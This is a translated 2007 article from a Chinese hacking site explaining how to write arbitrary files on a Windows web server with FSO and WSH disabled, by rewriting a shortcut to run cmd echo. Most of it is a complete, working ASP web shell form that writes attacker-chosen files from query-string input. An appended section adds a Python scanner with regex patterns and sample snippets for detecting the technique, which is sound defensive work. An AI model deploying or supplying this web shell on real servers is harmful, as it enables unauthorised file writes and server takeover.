Writing files despite disabled FSO/WSH: vulnerability alert - Black Bar Safety Net

ID MYHACK58:62200715809
Type myhack58
Reporter Anonymous (佚名)
Modified 2007-06-11T00:00:00


The code has now been "upgraded" as well, so that it can write a file: on a host where FSO and WSH are disabled, writing a file is genuinely difficult. You might ask whether the Shell object has any file-writing function at all. Indeed, MSDN documents none, but the Shell object can modify an existing LNK/URL/PIF file, and the modified copy can be saved under another file name.

Is being able to write only the contents of such a file useful? If we use the Shell object's InvokeVerb method to execute this LNK file, then can't we write any file we like? Why? Because the program a LNK file points to can be given parameters, so we can call cmd's echo to write the file.

The idea is good; in practice, programming it ran into the following problems:

1. Find a LNK file that everyone can read and copy. A little searching turned one up: the default LNK files under "C:\Documents and Settings\Default User\Start Menu\Programs\Accessories" are readable by every user by default.

2. When writing content with cmd.exe /c echo, characters with special meaning such as ">", "<", the double quotation mark and "&" cannot be written directly; they MUST be prefixed with the escape character ^. In addition, the double quotation mark has special meaning in VB as well, so it can only be expressed with chr(34).

<%
path=trim(Request.QueryString("path"))
text=trim(Request.QueryString("text"))
' the original used "&" here; the condition needs the logical "and"
if text<>"" and path<>"" then
    ' escape the cmd metacharacters listed above so echo writes them literally
    text=replace(text,">","^>")
    text=replace(text,"<","^<")
    text=replace(text,"&","^&")
    text=replace(text,chr(34),"^"&chr(34))
    ' load a world-readable LNK, retarget it, and save the modified copy elsewhere
    set shell=server.createobject("shell.application")
    set shellfolder=shell.namespace("C:\Documents and Settings\Default User\Start Menu\Programs\Accessories")
    set shellfolderitem=shellfolder.parsename("Notepad.lnk")
    set objshelllink=shellfolderitem.getlink
    objshelllink.path="cmd.exe"
    objshelllink.arguments="/c echo "&text&">"&path&" &&del c:\a.lnk"
    objshelllink.save("c:\a.lnk")
    ' execute the saved shortcut
    shell.namespace("c:\").items.item("a.lnk").invokeverb
end if
%>

<html>
<title>CZY's a shell virus II</title>
<form action=shell2.asp>
The path and file name: <input type=text name=path size=40><p>
File contents: <textarea name=text rows=20 cols=50></textarea><p>
<input type=submit value="generate file">
</form>
</html>
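From the defender's side, an added example (not part of the original article) of how this write primitive can be flagged in ASP source: a scanner that looks for the Shell.Application / GetLink / LNK save / InvokeVerb chain together with a cmd echo redirection, tolerant of case and of whitespace around dots. The two ASP snippets are constructed samples, not from any real deployment.

```python
import re

# Indicators of the LNK-rewrite file-write primitive described above.
# "\s*" around dots tolerates identifiers split by spaces, which is both
# a common extraction artifact and a simple obfuscation trick.
INDICATORS = [
    ("shell_application", r"createobject\s*\(\s*[\"']shell\.application[\"']\s*\)"),
    ("getlink",           r"\.\s*getlink\b"),
    ("lnk_rewrite",       r"\.\s*(path|arguments)\b\s*="),
    ("save_lnk",          r"\.\s*save\s*\(?\s*[\"'][^\"']*\.lnk[\"']"),
    ("invokeverb",        r"\.\s*invokeverb\b"),
    ("cmd_echo_redirect", r"/c\s+echo\b[^\r\n]*>"),
]

def scan_asp(source: str) -> dict:
    """Return {indicator_name: match_count} for every indicator present."""
    hits = {}
    for name, pattern in INDICATORS:
        n = len(re.findall(pattern, source, flags=re.IGNORECASE))
        if n:
            hits[name] = n
    return hits

def is_lnk_write_primitive(source: str) -> bool:
    """Verdict: the full object chain plus either a .lnk save or a cmd echo payload."""
    h = scan_asp(source)
    chain = all(k in h for k in ("shell_application", "getlink", "invokeverb"))
    return chain and ("cmd_echo_redirect" in h or "save_lnk" in h)

# Constructed sample resembling the technique in the article.
SUSPICIOUS = r'''<%
set shell=server.createobject("shell.application")
set item=shell.namespace("C:\Program Files").parsename("x.lnk")
set lnk=item.getlink
lnk.path="cmd.exe"
lnk.arguments="/c echo "&text&">"&path
lnk.save("c:\a.lnk")
shell.namespace("c:\").items.item("a.lnk").invokeverb
%>'''

# Constructed benign sample: uses Shell.Application only to list a folder.
BENIGN = r'''<%
set shell=server.createobject("shell.application")
for each f in shell.namespace("C:\inetpub\logs").items
  response.write f.name & "<br>"
next
%>'''
```

Using Shell.Application alone is not a verdict; the benign listing above scores only one indicator, while the chain plus the echo redirection is what marks the write primitive.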